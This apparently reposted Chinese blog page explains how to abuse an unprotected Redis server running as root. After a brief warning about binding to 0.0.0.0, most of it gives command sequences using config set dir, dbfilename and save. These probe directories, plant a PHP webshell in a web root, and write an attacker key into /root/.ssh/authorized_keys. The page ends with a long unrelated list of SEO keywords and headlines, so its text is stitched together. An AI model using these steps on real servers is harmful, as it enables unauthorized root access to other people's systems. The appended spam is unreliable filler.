关于Redis的一些好玩东西
发表于:2025-01-20 作者:千家信息网编辑
千家信息网最后更新 2025年01月20日,在许多服务器上部署的Redis是采用Root权限进行启动进而可以利用这个Root做许多超级权限的事情。由于REDIS是没有严格授权管理机制大家在部署一定不要设置为0.0.0.0以及最好使用requir
千家信息网最后更新 2025年01月20日关于Redis的一些好玩东西
在许多服务器上部署的Redis是采用Root权限进行启动进而可以利用这个Root做许多超级权限的事情。由于REDIS是没有严格授权管理机制大家在部署一定不要设置为0.0.0.0以及最好使用requirepass(虽然是明文但是至少增加一定的难度)。
本文主要利用的是redis提供的configsave两个命令来完成我们的HACK功能便捷的工具用歪了就成了祸害。
简单介绍几个有用的命令
config set dir $path:
这个命令是配置为了指定redis的"工作路径"之后生成的RDB和AOF文件都会存储在这里
dbfilename $name:
RDB文件名默认为"dump.rdb"
save:
将内存里的数据进行持久化操作
它们结合在一起就可以实现如下好玩的功能
1.指定文件夹是否存在
config set dir /home/bob
如果是返回(error) ERR Changing directory: No such file or directory表示没有该文件夹。
如果返回OK表示服务器上有这个文件夹并且已经将其设置为内存快照保存的文件夹
2.webshell最好使用之前进行flushdb,或者flushall清空内存里数据
1.config set dir /opt/web/www #设定网站的目录2.config set dbfilename test.php #设定将要保存的文件名3.set "" "" #我们的webshell4.save #将内存持久化到test.php
3.访问信任
1.cat ~/.ssh/id_rsa.pub > ~/foo.txt2.cat ~/foo.txt|redis -x set hack #将foo.txt里的内容保存为一个KEY为hack的字符串3.config set dir /root/.ssh/ #设定root的.ssh文件夹4.config set dbfilename authorized_keys5.save
文件
文件夹
内存
命令
功能
数据
文件名
最好
服务器
权限
服务
好玩
便捷
两个
事情
内容
字符
字符串
工具
快照
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
软件开发工程师表扬信范文
数据库关系模型中的3NF
互联网科技新零售动态
宅霸请重新选择服务器
读取sql文件转到数据库
电视海尔服务器
服务器房主变成成员怎么办
互联网蓝色科技ppt
云服务器镜像功能是什么意思
网络技术测试员
生源溯源数据库
软件开发团队工作经验
网络技术如何影响民主政治的发展
硬盘数据库清理
汕头pc软件开发定制
创弈网络技术有限公司
西安电信宽带服务器设置
win7系统当服务器吗
计算机网络技术校企合作怎样
花雨亭生存服务器价格
sum数据库
华为网络技术学院昆明接口人
足球大师2亨利捏脸数据库
cs魔兽服务器
db2数据库恢复后无法连接
龙岗区定制服务器机柜
硬盘插入服务器组装线
app软件开发创意图
那个公司软件开发
es和普通数据库的区别